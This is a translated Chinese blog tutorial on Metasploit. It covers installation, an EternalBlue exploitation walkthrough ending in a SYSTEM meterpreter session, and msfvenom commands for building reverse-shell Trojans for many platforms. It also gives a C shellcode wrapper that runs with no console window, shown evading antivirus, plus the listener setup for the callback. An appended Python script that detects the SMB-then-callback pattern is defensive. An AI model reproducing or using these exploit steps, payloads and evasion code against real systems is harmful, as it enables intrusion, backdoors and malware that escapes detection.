How to use MSF

Date: 2022-8-18

WeChat official account: White hat left one

This article is for technical discussion only; using it for illegal purposes is prohibited.

Introduction to MSF

Metasploit (MSF) is a free, downloadable framework that makes it easy to acquire, develop and run exploits for software vulnerabilities. It ships with exploits for hundreds of known vulnerabilities and is a professional-grade exploitation tool.

When HD Moore released Metasploit in 2003, the state of computer security changed permanently: almost overnight, anyone who knew how to use MSF could attack unpatched or freshly patched vulnerabilities. As a result, software vendors could no longer delay releasing patches for published vulnerabilities, because the Metasploit team kept developing exploit modules and contributing them to all Metasploit users.

Introduction to MSF Installation

MSF official website: https://www.metasploit.com/

There are two editions: Metasploit Framework is open source and free, and Metasploit Pro is a paid commercial product. Here we use the free community edition.

MSF download address: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

MSF installation

(1) One-click installation

To install Metasploit on Linux/macOS, the official script below installs it in one step:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall

(2) Manual installation

Note: if the above method does not work, you can also install manually.

Debian/Ubuntu packages are at https://apt.metasploit.com, and the CentOS/RedHat/Fedora packages are at https://rpm.metasploit.com

Ubuntu installation
Download the MSF .deb package from https://apt.metasploit.com/
Run in a terminal: dpkg -i metasploit-framework_6.0.7+20200916102431_1rapid7-1_amd64.deb
Installation is complete; for the database setup see the PostgreSQL steps below.

CentOS installation
Download the .rpm package from https://rpm.metasploit.com
Run in a terminal: rpm -i metasploit-framework-6.0.7+20200916102441~1rapid7-1.el6.x86_64.rpm

Installation is complete.

Install the PostgreSQL database

MSF uses a PostgreSQL database; if one is not present, install it first.

When the database is installed, the system user postgres, the database user postgres and the database postgres are created automatically.

1. apt-get install postgresql  // Install PostgreSQL

2. su - postgres  // Switch to the postgres user

3. psql  // Log in to PostgreSQL; there is no password on first login

4. \password postgres  // Set the password of the database user postgres

MSF update command:

sudo msfupdate

Using the database from MSF

1. msfconsole  // Start msf

2. db_connect postgres:[email protected]/test  // Syntax is user:password@host/database; the username, password, host and database name are chosen by you

3. db_status  // Check the database connection status

Introduction to the functional modules of MSF

The functionality of MSF is divided into the following modules; each has its own role, and together they form the penetration-testing workflow.

1. Auxiliary (auxiliary modules)
Provide a large number of modules that support information gathering during penetration testing
2. Exploits (exploit modules)
Code that exploits a discovered vulnerability or configuration weakness in a remote target system to gain access to it
3. Payload (payload modules)
Code implanted into the target that runs after a successful exploit
4. Post (post-exploitation modules)
Gather more information about, or gain further access to, the compromised target system
5. Encoders (encoder modules)
Encode payloads to evade protection software

Basic usage of MSF

For example, attacking EternalBlue:

Start the database: service postgresql start

Initialize the msf database: msfdb init

Start MSF: msfconsole

Here we use the EternalBlue vulnerability for a simple demonstration.

First of all, make sure the target machine is reachable: ping it to check that the network is connected.

It is connected.

EternalBlue's vulnerability number: MS17-010

Search by vulnerability number: search ms17_010

1. Use the auxiliary module to scan the target

Select the module: use auxiliary/scanner/smb/smb_ms17_010

View the settings: options

Set the target address: set rhosts 192.168.174.129

The default target port is 445. If an nmap port scan shows that the Windows file-sharing service is not on port 445, change it here: set rport <target port>

After setting the options, enter run or exploit to launch the module.

A green plus sign means the host is exploitable.

2. Use the exploit module to attack the target

Select the exploit module: use exploit/windows/smb/ms17_010_eternalblue

View the required settings: options

Set the target address: set RHOSTS 192.168.174.129

Set the target port: set RPORT 445

Set the payload: set payload windows/x64/meterpreter/reverse_tcp

Set the local address: set LHOST 192.168.174.192

Attack: run or exploit

The attack succeeds and a session is obtained.

Note: there is a certain chance that the target machine will blue-screen or restart.

View the current privileges

SYSTEM privileges, you can do whatever you want~

MSF backdoor generation module

Common msfvenom command-line parameters

  -l, --list            # List all available items; the value can be payloads, encoders, nops, platforms, archs, encrypt, formats, etc.
  -p, --payload         # Specify a payload; if set to -, it is read from standard input
  --list-options        # List the standard, advanced and evasion options of the --payload
  -f, --format          # Output format of the payload (list with --list formats)
  -e, --encoder         # Encoder to use (list with --list encoders)
  --sec-name            # Section name to use when building large Windows binaries; default: random 4-character string
  --smallest            # Generate the smallest payload using all available encoders
  --encrypt             # Encryption or encoding type to apply to the shellcode (list with --list encrypt)
  --encrypt-key         # Key used for the encryption
  --encrypt-iv          # Initialization vector for the encryption
  -a, --arch            # Target architecture (list with --list archs)
  --platform            # Target platform (list with --list platforms)
  -o, --out             # Save the payload to a file
  -b, --bad-chars       # Characters to avoid in the payload, e.g. '\x00\xff'
  -n, --nopsled         # Number of NOPs to prepend to the payload
  -s, --space           # Maximum size of the unencoded payload
  --encoder-space       # Maximum size of the encoded payload
  -i, --iterations      # Number of times to encode the payload
  -c, --add-code        # Include an additional win32 shellcode file
  -x, --template        # Use a specific executable file as a template
  -k, --keep            # Preserve the template program's functionality; the injected payload runs as a new process
  -v, --var-name        # Variable name to use (with a code output format such as -f python, the payload is emitted as code appended to a variable; this sets that variable's name)
  -t, --timeout         # Seconds to wait when reading the payload from STDIN (default 30, 0 disables)
  -h, --help            # Help

msfvenom shellcode generation

Plain generation

  msfvenom -p <payload> -f <output format> -o <output file>
  msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

Encoded generation

  msfvenom -a <architecture> --platform <platform> -p <payload> lhost=<attacker IP> lport=<attacker port> -e <encoder> -i <iterations> -f <output format> -o <output file>
  msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

msfvenom --list archs  # View supported architectures

  aarch64, armbe, armle, cbea, cbea64, cmd, dalvik, firefox, java, mips, mips64, mips64le, mipsbe, mipsle, nodejs, php, ppc, ppc64, ppc64le, ppce500v2, python, r, ruby, sparc, sparc64, tty, x64, x86, x86_64, zarch

msfvenom --list platforms  # View supported platforms

  aix, android, apple_ios, bsd, bsdi, cisco, firefox, freebsd, hardware, hpux, irix, java, javascript, juniper, linux, mainframe, multi, netbsd, netware, nodejs, openbsd, osx, php, python, r, ruby, solaris, unifi, unix, unknown, windows

msfvenom -l payload  # List all available payloads

msfvenom -l formats  # List all output formats

msfvenom -l encrypt  # List all encryption methods

msfvenom -l encoders  # List all encoders

Common build formats

1. Windows

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

2. Linux

msfvenom --platform linux -a x86 -p linux/x86/meterpreter/reverse_tcp -f elf -o payload.elf

3. Mac

msfvenom --platform osx -a x86 -p osx/x86/shell_reverse_tcp -f macho -o payload.macho

4. Android

msfvenom -p android/meterpreter/reverse_tcp -o payload.apk

5. ASPX

msfvenom --platform windows -p windows/meterpreter/reverse_tcp -f aspx -o payload.aspx

6. JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp -f raw -o payload.jsp

7. PHP

msfvenom -p php/meterpreter_reverse_tcp -f raw -o payload.php

8. Bash

msfvenom -p cmd/unix/reverse_bash -f raw -o shell.sh

9. Python

msfvenom -p python/meterpreter/reverse_tcp -f raw -o shell.py

How to make a Trojan evade anti-virus

Making a Trojan evade anti-virus is essentially changing its signature, so in summary the options are:

  1. Encoding
  2. Packing
  3. Recompiling
  4. Separation: keep the shellcode and the loader apart

At present the signatures of the msfvenom encoders have basically all been added to anti-virus signature databases, so a single pass of an encoder can hardly bypass anti-virus. Further modifying the shellcode and compiling it into a program has therefore become the mainstream approach to evasion with msf. There are many examples online that re-wrap the shellcode in C, C#, Python and other languages to achieve evasion.

Step 1: install the compiler, VC++ 6.0

Step 2: generate an ordinary Trojan

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.174.196 lport=1250 -f c

Step 3: compile the C code into an exe file

  #include "stdafx.h"
  #include <windows.h>
  /* Build as a GUI-subsystem program so no console window appears */
  #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
  unsigned char buf[] =
  /* (the string literal generated by msfvenom -f c, ending with ;, is placed here) */
  int main()
  {
      /* Treat the byte array as a function and jump into it */
      ((void(*)(void))&buf)();
      return 0;
  }

Open VC 6.0 and create a new project

Choose a simple Win32 application

Open a.cpp

Paste our code in

Compile it to check for errors

Compile a.cpp again

If there are no errors, build a.exe; this file is the Trojan we want

Step 4: test whether it works

Copy the resulting a.exe to the desktop, right-click it and try 360's cloud Trojan scan on it

Bypassed successfully~

To test whether our Trojan works, open MSF and start a listener:

  Start the listener: msf5 > use exploit/multi/handler
  Set the payload to match the generated Trojan: set payload windows/meterpreter/reverse_tcp
  Set the local address to match the Trojan: set lhost 192.168.174.196
  Set the local port to match the Trojan: set lport 1250

  msf5 exploit(multi/handler) > run

We get the session, which proves that our Trojan works~
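As an added example (not from the original article), the following Python script flags, in constructed flow records, the network pattern that both the EternalBlue walkthrough and the handler test above produce from the target's side: an inbound SMB connection on TCP 445 followed shortly by the target connecting back to the same host on the reverse_tcp LPORT. The addresses and the port 1250 are the ones used on this page; the whitespace-separated flow format is an assumption.

```python
from collections import defaultdict

# Constructed sample flow records (not real captures): ts src src_port dst dst_port.
# 192.168.174.192 plays the msfconsole host and 192.168.174.129 the Windows target,
# as in the walkthrough; 1250 is the LPORT used with the handler above.
SAMPLE_FLOWS = """\
1660800000 192.168.174.10 50122 192.168.174.20 445
1660800005 192.168.174.192 41500 192.168.174.129 445
1660800006 192.168.174.192 41502 192.168.174.129 445
1660800031 192.168.174.192 41510 192.168.174.129 445
1660800033 192.168.174.129 49712 192.168.174.192 1250
1660800120 192.168.174.20 51000 192.168.174.10 445
1660800500 192.168.174.129 49720 192.168.174.192 80
"""


def parse_flows(text):
    """Parse flow lines into (ts, src, sport, dst, dport) tuples sorted by time."""
    flows = []
    for line in text.splitlines():
        if line.strip():
            ts, src, sport, dst, dport = line.split()
            flows.append((int(ts), src, int(sport), dst, int(dport)))
    return sorted(flows)


def find_smb_callbacks(text, window=60):
    """Return (victim, smb_client, callback_port, seconds_after_last_smb) for every
    outbound connection a host opens to a peer that reached it on TCP 445 within
    the last `window` seconds. Ordinary SMB traffic (dport 445) is never flagged."""
    last_smb = defaultdict(dict)   # victim -> {client: ts of its latest 445 connection}
    hits = []
    for ts, src, _sport, dst, dport in parse_flows(text):
        if dport == 445:
            last_smb[dst][src] = ts     # remember who talked SMB to this host
            continue
        prev = last_smb[src].get(dst)   # did dst reach src over SMB recently?
        if prev is not None and ts - prev <= window:
            hits.append((src, dst, dport, ts - prev))
    return hits


if __name__ == "__main__":
    for victim, client, port, delta in find_smb_callbacks(SAMPLE_FLOWS):
        print(f"{victim} connected back to {client}:{port} {delta}s after SMB contact")
```

The benign file-server exchange between .10 and .20 and the late connection to port 80 are not flagged with the default window, which is the tuning knob to adjust for your environment.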